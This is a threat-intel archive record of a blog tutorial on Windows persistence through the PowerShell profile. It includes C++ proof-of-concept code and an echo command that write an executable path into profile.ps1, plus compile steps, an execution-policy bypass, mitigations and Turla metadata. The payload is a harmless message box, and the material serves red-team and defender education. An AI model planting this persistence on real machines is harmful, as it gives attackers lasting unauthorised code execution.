{ "id": "d0d71c74-412e-4f4f-85bc-253caa38bfaf", "created_at": "2026-04-06T00:15:18.11881Z", "updated_at": "2026-04-10T13:11:22.108361Z", "deleted_at": null, "sha1_hash": "0d969a05942fd365a42743393f658a8804bab908", "title": "Malware development: persistence - part 11. Powershell profile. Simple C++ example.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1331312, "plain_text": "Malware development: persistence - part 11. Powershell profile.\r\nSimple C++ example.\r\nBy cocomelonc\r\nPublished: 2022-09-20 · Archived: 2026-04-05 21:59:27 UTC\r\n3 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is the result of my own research into one of the interesting malware persistence trick: via powershell\r\nprofile.\r\npowershell profilePermalink\r\nA PowerShell profile is a powershell script that allows system administrators and end users to configure their\r\nenvironment and perform specified commands when a Windows PowerShell session begins.\r\nThe PowerShell profile script is stored in the folder WindowsPowerShell :\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nPage 1 of 14\n\nLet’s add the following code to a to the current user’s profile file, that will be performed whenever the infected\r\nuser enters a powershell console:\r\nZ:\\2022-09-20-malware-pers-11\\hack.exe\r\nI will demonstrate everything with a practical example and you will understand everything.\r\npractical examplePermalink\r\nFirstly, create our “malicious” file:\r\n/*\r\nhack.cpp\r\nevil app for windows\r\npersistence via powershell profile\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n MessageBox(NULL, \"Meow-meow!\", \"=^..^=\", MB_OK);\r\n return 0;\r\n}\r\nAs usually it is just “meow-meow” messagebox.\r\nCompile it:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nPage 2 of 14\n\nAnd we can run at victim machine for checking correctness:\r\nThen we do this simple “trick”:\r\necho Z:\\2022-09-20-malware-pers-11\\hack.exe \u003e \"%HOMEPATH%\\Documents\\windowspowershell\\profile.ps1\"\r\nAnd finally, run powershell:\r\npowershell -executionpolicy bypass\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nPage 3 of 14\n\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nPage 4 of 14\n\nAs you can see, our malicious logic executed as expected and powershell is the parent process of our messagebox.\r\n=^..^=\r\nI created a simple PoC code to automate this process:\r\n/*\r\npers.cpp\r\nwindows persistence via Powershell profile\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\n*/\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nPage 5 of 14\n\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\n#include \u003cstrsafe.h\u003e\r\n#include \u003ciostream\u003e\r\nint main(int argc, char* argv[]) {\r\n char path[MAX_PATH];\r\n char *homepath = getenv(\"USERPROFILE\");\r\n char pspath[] = \"\\\\Documents\\\\windowspowershell\";\r\n char psprofile[] = \"\\\\profile.ps1\";\r\n char evil[] = \"Z:\\\\2022-09-20-malware-pers-11\\\\hack.exe\";\r\n DWORD evilLen = (DWORD)strlen(evil);\r\n StringCchCopy(path, MAX_PATH, homepath);\r\n StringCchCat(path, MAX_PATH, pspath);\r\n BOOL wd = CreateDirectoryA(path, NULL);\r\n if (wd == FALSE) {\r\n printf(\"unable to create dir: %s\\n\", path);\r\n } else {\r\n printf(\"successfully create dir: %s\\n\", path);\r\n }\r\n StringCchCat(path, MAX_PATH, psprofile);\r\n HANDLE hf = CreateFile(\r\n path,\r\n GENERIC_WRITE,\r\n 0,\r\n NULL,\r\n CREATE_NEW,\r\n FILE_ATTRIBUTE_NORMAL,\r\n NULL\r\n );\r\n if (hf == INVALID_HANDLE_VALUE) {\r\n printf(\"unable to create file: %s\\n\", path);\r\n } else {\r\n printf(\"successfully create file: %s\\n\", path);\r\n }\r\n BOOL wf = WriteFile(hf, evil, evilLen, NULL, NULL);\r\n if (wf == FALSE) {\r\n printf(\"unable to write to file %s\\n\", path);\r\n } else {\r\n printf(\"successfully write to file evil path: %s\\n\", evil);\r\n }\r\n CloseHandle(hf);\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nPage 6 of 14\n\nreturn 0;\r\n}\r\nThe logic is simple, this script just create profile folder if not exists, then create profile file and update it.\r\ndemoPermalink\r\nLet’s go to see everything in action. Compile our PoC:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nAnd run it on the victim’s machine:\r\n.\\pers.exe\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nPage 7 of 14\n\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nPage 8 of 14\n\nAnd when powershell session is started:\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nPage 9 of 14\n\nIf we check it via Process Hacker:\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nPage 10 of 14\n\npowershell.exe is the parent process again as expected.\r\nAs you can see everything is worked perfectly! =^..^=\r\nBut there are the caveat. If powershell runned without execution policy bypass mode, this persistence trick not\r\nwork in my case:\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nPage 11 of 14\n\nAlso there are four places you can abuse the powershell profile, depending on the privileges you have:\r\n$PROFILE | select *\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nPage 12 of 14\n\nBy storing arbitrary instructions in the profile script, PowerShell profiles present several chances for code\r\nexecution. To avoid relying on the user to start PowerShell, you may use a scheduled job that executes PowerShell\r\nat a certain time.\r\nmitigationsPermalink\r\nEnforce execution of only signed PowerShell scripts. Sign profiles to avoid them from being modified. Also you\r\ncan avoid PowerShell profiles if not needed, for example via -No-Profile flag.\r\nThis persistence trick is used by Turla in the wild.\r\nI hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red\r\nteamers arsenal.\r\nMicrosoft PowerShell profiles\r\nMITRE ATT\u0026CK. Event Triggered Execution: PowerShell Profile\r\nTurla\r\nsource code on github\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nPage 13 of 14\n\nThis is a practical case for educational purposes only.\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nhttps://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html" ], "report_names": [ "malware-pers-11.html" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434518, "ts_updated_at": 1775826682, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0d969a05942fd365a42743393f658a8804bab908.pdf", "text": "https://archive.orkl.eu/0d969a05942fd365a42743393f658a8804bab908.txt", "img": "https://archive.orkl.eu/0d969a05942fd365a42743393f658a8804bab908.jpg" } }